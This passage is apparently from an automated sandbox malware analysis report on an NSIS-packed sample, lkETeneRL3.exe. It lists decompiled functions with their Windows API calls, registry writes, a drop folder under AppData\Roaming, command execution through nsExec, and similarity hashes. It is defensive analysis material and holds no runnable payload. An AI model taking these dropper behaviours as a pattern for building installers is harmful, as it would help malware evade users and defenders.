lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,004050B4,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000), ref: 0040608D

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F80
Remove folder: , xrefs: 00405EAC, 00405F7E, 00405F9B, 00405FB0, 00405FC3, 00405FDF, 0040600A, 0040603A, 00406040, 00406058, 0040606B, 00406086, 0040608C, 00406097, 004060C1
error, xrefs: 00406065
Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\, xrefs: 00405EB4
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406035

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Remove folder: $Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$error
API String ID: 900638850-2401118719
Opcode ID: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
Opcode Fuzzy Hash: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E

Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Strings

C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll, xrefs: 0040181E, 0040183A
ExecToStack, xrefs: 0040176D, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp, xrefs: 0040179B, 0040180A, 00401828
error, xrefs: 00401805, 00401811, 00401829
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 0040177E

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp$C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$ExecToStack$error
API String ID: 1941528284-1998601519
Opcode ID: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
Opcode Fuzzy Hash: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD

Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000), ref: 004050D8
SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\), ref: 004050EA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Strings

Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\, xrefs: 0040509C, 004050AE, 004050B4, 004050D7, 004050E3

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\
API String ID: 2531174081-994926613
Opcode ID: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
Opcode Fuzzy Hash: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8

Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405585
GetLastError.KERNEL32 ref: 00405599
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
GetLastError.KERNEL32 ref: 004055B8

Strings

ds@, xrefs: 00405577
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405568
C:\Users\user\Desktop, xrefs: 00405542
ts@, xrefs: 00405548

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-228423945
Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA

Function 0040618E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
wsprintfA.USER32 ref: 004061DE
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2

Strings

\, xrefs: 004061B6
%s%s.dll, xrefs: 004061D8
UXTHEME, xrefs: 00406197

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69

Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Strings

error, xrefs: 0040200F

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: error
API String ID: 2987980305-1574812785
Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
Opcode Fuzzy Hash: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Strings

C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp, xrefs: 004023B3, 004023C1, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp
API String ID: 1356686001-1040044349
Opcode ID: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
Opcode Fuzzy Hash: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28

Function 00405B05 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B19
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405B33

Strings

"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 00405B05
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B08
nsa, xrefs: 00405B10

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\lkETeneRL3.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-4224178323
Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
Opcode Fuzzy Hash: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69

Function 004036F1 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403528,?), ref: 00403703
CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user~1\AppData\Local\Temp\,00403528,?), ref: 00403717

Strings

C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\, xrefs: 00403727
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004036F6

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\
API String ID: 2962429428-3122764717
Opcode ID: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
Instruction ID: a64c404821d2138faf7c298dc7aa4842799881c741ebf925b7f901023762ac75
Opcode Fuzzy Hash: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
Instruction Fuzzy Hash: C6E086B0500620D6C524AF7CAD855463B196B413357208322F574F30F1C338AD435EAC

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0,00000000), ref: 0040597C
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 00405542: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405585

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 00401629

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
